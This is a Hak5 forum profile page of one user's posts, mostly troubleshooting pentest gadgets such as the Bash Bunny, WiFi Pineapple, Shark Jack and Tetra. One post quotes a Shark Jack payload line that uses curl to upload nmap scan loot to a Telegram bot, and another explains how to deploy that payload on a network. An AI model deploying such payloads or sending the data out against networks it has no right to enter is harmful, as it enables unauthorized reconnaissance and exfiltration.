Jump to content


Active Members
  • Content Count

  • Joined

  • Last visited

  • Days Won


Everything posted by chrizree

  1. Is it mandatory that this needs to happen in arming mode specifically? You could include the possibility to connect to a known wireless network if it's available "in the air" and circumvent any scripted attack in attack mode if so.
  2. CTRL-SHIFT ENTER works on my USB Rubber Ducky in scenarios where I, for example, want to run a Command Prompt in Windows 10 as Administrator.
  3. If possible, I would suggest that you verify it all in a "clean" environment. I.e. in an OS installed in an ordinary fashion, no Docker container or virtual environment. Just to rule out the fact that there might be some problem with the Bunny itself. If that works, I would then start to hunt down issues in the Docker implementation.
  4. This works for me... With no Bash Bunny plugged in, run bb.sh sudo bash ./bb.sh or just sudo ./bb.sh (sudo not needed on Kali if you run as "in the old days", i.e. default to use root all the time) Run the setup if it hasn't been run on the particular PC before [G]uided setup (recommended) Plug in the Bash Bunny in step 3 After the setup is done, unplug the Bunny and run bb.sh again Then select (this is most likely the step that you have missed doing) [C]onnect using saved settings Plug the Bunny in You will get the "Cloud>PC>Bunny" Ascii art after a
  5. GuitarGuy has written both posts (here and GitHub)
  6. Well, even if I can't get my own Nano running, I won't keep any OpenVPN secrets from you šŸ™‚ Try the following... Note that this has been done on a LAN Turtle (and also on my "non Hak5" mips_24kc based GL-AR150), *not* the WiFi Pineapple Nano since it crashes/panics all the time when initiating a VPN connection. As a matter of fact, I'm writing this post using the LAN Turtle based autostarted OpenVPN connection. I'm adding a standard "Do this at your own risk" message to begin with šŸ˜¬ The OpenVPN modules are of course available in the Pineapple file system, but I wouldn't go down t
  7. The changelog for 2.7.0 says "Fixed an issue where OpenVPN would cause a kernel panic upon establishing tunnel." However, I'm experiencing this specific issue even with 2.7.0 installed on my Nano. I've tried several different VPN services that works perfectly fine with more beefy distros using CLI, so I'm 100% sure that the setup is working. I can follow the "negotiations" on screen when the VPN is established on the Nano, but in the end when the interface is to be brought up, the Nano resets/reboots. This happens all the time. I'm not using the available GUI module for this, but pure CLI conf
  8. So you get a tun interface listed when you ssh into the Pineapple and run ifconfig (or check the available interfaces in the Networking "tab" of the Pineapple web GUI). The "running..." status in the web GUI doesn't necessarily mean that the VPN is up. I forced the Nano into that status just with some bogus settings that doesn't actually establish any VPN connection, so I wouldn't count on that it actually is a 100% reliable status indicator. However, my Nano reboots all the time as I try to do the "non GUI" setup of a OpenVPN client. It doesn't matter if using different VPN providers or diffe
  9. The ALFA AWUS036ACH uses the Realtek RTL8812AU, so kmod-rtl8812au-ct should be used, but I guess there will be less luck doing so. Perhaps it works using the Tetra, but the Nano keeps on resetting/rebooting when using adapters based on that chipset for some reason. Even when using a beefy power supply. https://www.alfa.com.tw/products_detail/1.htm https://deviwiki.com/wiki/ALFA_Network_AWUS036ACH
  10. OK, what Pineapple firmware version are you running? The latest (2.7.0) or some older one?
  11. Did you get the manually set up VPN working? Reading your post from the 25th of June, it appears that you hadn't gotten that to work at that moment, but now it seems as if you can at least start it manually. The reason for my question is to make sure you know that the VPN connection from the WiFi Pineapple is really up and running, i.e. that you have verified the public facing IP address is originating from ExpressVPN and that the tun interface is up. The OpenVPN GUI/module for the WiFi Pineapple isn't that accurate sadly. It says that is enabled or running but it can be totally "dead" under t
  12. The easiest way is probably to delete the db file (as said) and start over. Since you seem to have just set it all up, you will not have to redo a lot of things within your Cloud C2 instance. If you care to try to crack the hash, it seems to be stored with bcrypt/blowfish (Hash-Mode 3200 in hashcat) but I guess you will unnecessarily heat up your GPU(s).
  13. I have no idea sadly. Please ask Hak5 support. https://shop.hak5.org/pages/support
  14. What is in the other end of the Micro USB cable that powers your Tetra? A USB charger of some kind? If so, how many amps is that charger able to produce? The only guaranteed power method for the Tetra is using the original 12V DC adapter, so I would wait for the new one to arrive before proceeding searching for possible sources to the problem. You could of course make absolutely sure that you supply enough power via USB (I wouldn't go with USB ports from a PC though, even with a Y cable). It needs 24 watts for normal stable operation, i.e. 5 A at 5 volt. On the other hand, you seem to have bee
  15. Do you experience the same problem as described in your post from the 3rd of January? https://forums.hak5.org/topic/50855-no-internet-acces-on-the-wifi-pineapple-tetra/?tab=comments#comment-326465 According to the Tetra documentation, the WAN port should be eth0, not the LAN port. You say in the first post in this thread that you want to use eth0 for WAN/internet access but in the second post in this thread you say that the LAN port is eth0 which makes it all a bit confusing. LAN should normally be on eth1 on the Tetra. https://docs.hak5.org/hc/en-us/articles/360010555493-Wired-Internet-c
  16. OK, I know this thread is getting full of grayish hair since it's old, but I still want to respond since it can help someone else in the community that is doing some searching in the future. Using a Raspberry Pi to hand out DHCP leases isn't limited to wireless only, but will of course work with wired communication as well. The media/carrier isn't any obstacle here. I use it in different scenarios and my "go to" friend when doing this is dnsmasq. It's easy to set up using a fresh Raspberry Pi OS Lite installation and then just add dnsmasq (plus the configuration needed that comes with it)
  17. Try the payload script on my GitHub repo. Note that the NETMODE file needs to be adjusted. https://github.com/chrizree/Hak5-SharkJack-MAC-pilfer-and-nmap-scanner And... I always get chills down my spine when 802.1X and MAC authentication is mentioned in the same sentence, but that's another discussion šŸ˜‰
  18. I can't seem to get NETMODE DHCP_SERVER to work on my Shark Jack in Attack Mode. Even with the simplest payload script, nothing happens when connecting it to a device. I've tried with several different PCs but no success at all for some strange reason. No link and no IP address received. The equivalent feature works perfectly well in Arming Mode though. I.e. I get an IP address assigned from the Shark Jack when connecting it to a PC. The Shark Jack runs the latest firmware (1.1.0) Edit: It seems as if Arming Mode uses dnsmasq and Attack Mode uses odhcpd. Since Arming Mode w
  19. Perhaps it's a bug in the script on line 100 (if you haven't changed it yourself) The line says curl -v -F "chat_id=YOUR CHANEL ID" -F document=@$LOOT_DIR/nmap-scan_$SCAN_M.txt $URL_FILE but the variable for the channel ID should be used of course instead of YOUR CHANEL ID, or putting the ID itself there, but... since there already is a variable for it in the script, $ID_CHANEL should be used as I can see it
  20. It's not much of a step-by-step needed actually. You just need a Telegram bot and a channel to add to the script. Copy the payload script from the GitHub source and make the changes needed (i.e. add the Telegram bot token and the channel id) Curl is also needed as per instructions in the payload script comments opkg update opkg install curl probably also opkg install libcurl Add the payload script file to the /root/payload/ directory of the Shark Jack Power off the Shark Jack and then put it in Attack Mode and plug it into an Ethernet port connecting to the network
  21. The very first of the tips I can give you is really to get dirt under your fingernails and dig into the the area of cyber security to better understand it all to get a foundation to build upon. Even though I think that Hak5 devices is a very good starting point since they make things easier for those that might not be that proficient, knowledge is always the base for everything. Operating within cybersec isn't like using a toaster sadly. There is no single button to press and get a slice of toasted bread. Of course there are scripts and solutions that can be used by nearly anyone, but they sti
  22. And... of course, since we are on the Hak5 forum, there are Hak5 devices that possibly can be used for this as well. It depends on how you want to do it and to what extent. For example the WiFi Pineapple, the Signal Owl, the Plunder Bug and the Packet Squirrel.
  23. There are two different scenarios here; one is to collect traffic passing your router/network and the other is to scan for WiFi devices. When it comes to Wireshark it's not an easy to use tool/software if skill levels are low or moderate. Collecting info is one thing, but analyzing it all later and fnd what you are really looking for will require a pretty heavy amount of skills when it comes to understanding protocols and networks in general. Then, you can't just capture traffic "just like that". You need some kind of relevant equipment to do it. It all depends on your setup. If it's an ordina
  24. chrizree


    The original post is pretty much almost 1 year old and the user has just posted once, so I guess there will be less of a chance that the original poster will get back with the final solution. However, there is a fairly new post (linked below) involving Telegram. Perhaps not the exact use case scenario as described in this thread, but it can be used as a base to develop/reproduce the same functionality using Telegram and the Shark Jack. https://forums.hak5.org/topic/53042-telegram-bot-nmap-sharjack/ https://github.com/felinuxing/sharkjack-payloads/blob/master/payloads/library/recon/Te
  25. I can replicate the problem using the same setup. I then tried the same with one of my GL.iNet mini-routers that are running a slightly later release of the OpenWRT kernel. It wasn't successful but the ALFA adapter at least identified itself with a correct MAC address. The rest of the test was a "crash and burn" though. Not working at all so I guess it has something to do with the package/driver/kmod for the 8812AU chipset or kernel related or a combo (or something else). Perhaps something more needs to be installed to get it working. From previous experience, dependencies aren't always instal
  • Create New...